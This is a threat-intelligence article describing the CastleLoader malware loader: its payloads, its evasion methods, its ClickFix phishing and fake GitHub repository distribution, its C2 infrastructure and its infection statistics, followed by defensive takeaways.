CastleLoader Malware

In the ever-evolving landscape of cyber threats, a new malware loader dubbed CastleLoader has emerged as a significant tool in the arsenals of cybercriminals. First detected in early 2025, CastleLoader has quickly gained traction due to its modularity, advanced evasion tactics, and adaptability. Researchers have observed its role in multiple campaigns that deploy information stealers and Remote Access Trojans (RATs), making it a growing concern in the malware-as-a-service (MaaS) ecosystem.

Versatility in Action: A Powerful Distribution Tool

CastleLoader has been used to deliver a wide range of malicious payloads, including:

• Information stealers: DeerStealer, RedLine, StealC
• Remote Access Trojans (RATs): NetSupport RAT, SectopRAT

Its modular structure allows CastleLoader to serve as both an initial dropper and a second-stage loader, enabling attackers to decouple the infection vector from the payload. This separation complicates detection and response efforts, making attribution significantly harder.

Obfuscation and Evasion: Staying One Step Ahead

CastleLoader uses several advanced techniques to avoid detection and hinder analysis:

• Dead code injection and packing to obscure its true functionality.
• Runtime unpacking to delay execution until after evading initial scanning layers.
• Anti-sandboxing measures and obfuscation, comparable to sophisticated loaders like SmokeLoader and IceID.

Once unpacked, the loader reaches out to its Command-and-Control (C2) server, downloads additional modules, and initiates their execution. The payloads are typically delivered as portable executables embedded with shellcode, which launches the loader's core routines.

Tactics and Techniques: Deception at Its Core

The campaigns using CastleLoader heavily rely on social engineering, particularly:

ClickFix-Themed Phishing Attacks
Victims are lured to malicious domains, masquerading as videoconferencing platforms, browser updates, developer libraries, or document verification portals, through poisoned Google search results. These pages contain fake error messages or CAPTCHA prompts that instruct users to execute PowerShell commands, unknowingly initiating the infection. ClickFix attacks have become a widespread technique adopted by numerous hacker groups.

Fake GitHub Repositories
CastleLoader also spreads through repositories that mimic legitimate open-source tools. Unsuspecting developers may run seemingly trustworthy installation scripts from these repositories, unwittingly infecting their systems. This tactic capitalizes on the perceived legitimacy of GitHub and developers' habitual trust in open repositories.

These strategies reflect techniques commonly used by Initial Access Brokers (IABs), reinforcing CastleLoader's position within a broader cybercriminal supply chain.

Overlapping Campaigns and Expanding Reach

Researchers have documented cross-campaign usage of CastleLoader and DeerStealer, noting that some variants of Hijack Loader were delivered via both tools. While the threat actors behind each campaign may differ, the overlapping use of loaders indicates a shared ecosystem or service model among cybercriminal groups.

From May 2025 onward, CastleLoader has been observed utilizing seven unique C2 servers, with 1,634 infection attempts recorded. Out of these, 469 devices were successfully compromised, resulting in an infection success rate of 28.7%.

The Infrastructure Behind the Threat

The C2 infrastructure supporting CastleLoader is notably robust. Its associated web-based panel provides centralized control over infected systems, echoing features found in malware-as-a-service platforms. This points to an experienced and organized operation behind the loader's development and deployment.

Key Takeaways: CastleLoader’s Growing Threat

CastleLoader is not just a loader, it's a strategic enabler of broader malware campaigns.

Its modular design, anti-analysis features, and diverse delivery tactics make it a prime tool for threat actors seeking flexibility and stealth.

By abusing trusted platforms like GitHub and exploiting user behavior through social engineering, CastleLoader underscores the need for enhanced vigilance and defensive strategies in both enterprise and developer environments.

As this threat continues to evolve, defenders must remain alert to new tactics and strengthen defenses against loaders that operate behind the scenes to power large-scale cybercrime.